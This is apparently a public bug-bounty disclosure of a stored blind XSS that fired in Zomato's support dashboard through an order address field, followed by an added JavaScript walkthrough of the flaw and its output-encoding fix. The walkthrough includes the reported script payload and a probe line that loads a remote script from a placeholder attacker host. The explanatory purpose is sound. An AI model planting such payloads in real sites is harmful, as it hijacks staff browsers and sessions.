[www.zomato.com] Blind XSS in one of the Admin Dashboard
State Resolved (Closed)
Disclosed publicly 2018-12-03T07:02:09.537Z
Reported To Zomato
Weakness Cross-site Scripting (XSS) - Stored
Bounty $500

Summary by sandeep_hodkasia

@sandeep_hodkasia identified a Blind XSS vulnerability that fired in one of our admin dashboards.

POC

  • @sandeep_hodkasia added "><script>alert(0);</script> [XSS Hunter was used in this case] in the address field while placing an order.

  • XSS triggered when one of our support agents viewed the order details.

Thanks @sandeep_hodkasia for helping us keep @zomato secure :)

Best,
Prateek
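
The POC above is the whole bug in two steps: the address stored at checkout is later rendered into the support agents' order-details page without output encoding, so the leading "> in the payload closes the attribute it lands in and the rest is parsed as markup. The following is an added example, not code from the report or from Zomato; the order-details template, the order record and the probe host are assumptions made for illustration. It renders the reported payload through a naive template and through one that HTML-encodes at output time, and includes the kind of check a reviewer can run over rendered markup.

```javascript
// Added example (not from the report): why the reported payload escapes an
// attribute in a naively rendered order-details view, and the output-encoding
// fix. The template, order record and probe host below are assumptions.

// The payload quoted in the report. A blind-XSS probe replaces alert(0) with a
// remote script load so the hunter learns where and when it fired
// (hypothetical host, stands in for an XSS Hunter probe URL).
const REPORTED_PAYLOAD = '"><script>alert(0);</script>';
const BLIND_PROBE = '"><script src="https://probe.example/p.js"></script>';

// Constructed order record: the address is attacker-controlled checkout input.
const order = {
  id: 'ORD-1',
  customer: 'Sandeep',
  address: REPORTED_PAYLOAD,
};

// VULNERABLE: the stored address is concatenated straight into an attribute
// value. The leading `">` closes the value attribute and the <input> tag, so
// everything after it is parsed as HTML when the agent's browser loads the page.
function renderOrderUnsafe(o) {
  return `<label>Address <input name="address" value="${o.address}"></label>`;
}

// FIX: encode the characters HTML gives special meaning before the value is
// placed in any HTML context (attribute value or text node). Encode at output
// time rather than at input time so the stored data stays intact for other
// consumers (receipts, APIs, delivery labels), which may not be HTML at all.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')   // first, so later entities are not double-encoded
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderOrderSafe(o) {
  return `<label>Address <input name="address" value="${escapeHtml(o.address)}"></label>`;
}

// Review check over rendered markup: a <script tag that exists only because of
// user-supplied data means the encoding step was skipped for that field.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Same check for a blind probe: the unsafe template emits a real <script src>
// pointing at the attacker's host; the safe one emits inert text.
function rendersProbe(renderFn) {
  return containsScriptTag(renderFn({ ...order, address: BLIND_PROBE }));
}

console.log(renderOrderUnsafe(order));
console.log(renderOrderSafe(order));
```

The safe rendering above is one output-encoding layer; the dashboard still benefits from a Content Security Policy that blocks inline and third-party script, which is what turns a missed encoding into a failed probe rather than a fired one.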

Timeline
submitted a report to Zomato.
2018-10-05T18:31:32.455Z

Regards,
Frans

prateek_0490-zomato Activities::BugTriaged
2018-10-05T18:36:09.913Z


prateek_0490-zomato Activities::Comment
2018-10-05T18:37:39.337Z


sandeep_hodkasia Activities::Comment
2018-10-05T19:23:52.355Z


prateek_0490-zomato Activities::BugResolved
2018-10-06T11:57:24.182Z


sandeep_hodkasia Activities::Comment
2018-10-06T12:43:17.779Z


Activities::BountyAwarded
2018-10-06T13:00:09.360Z


sandeep_hodkasia Activities::AgreedOnGoingPublic
2018-11-28T10:59:23.750Z


prateek_0490-zomato Activities::Comment
2018-11-28T11:00:30.303Z


prateek_0490-zomato Activities::ReportTitleUpdated
2018-11-28T11:09:02.618Z


sandeep_hodkasia Activities::Comment
2018-12-03T04:06:39.635Z


prateek_0490-zomato Activities::AgreedOnGoingPublic
2018-12-03T07:02:09.490Z


prateek_0490-zomato Activities::ReportBecamePublic
2018-12-03T07:02:09.557Z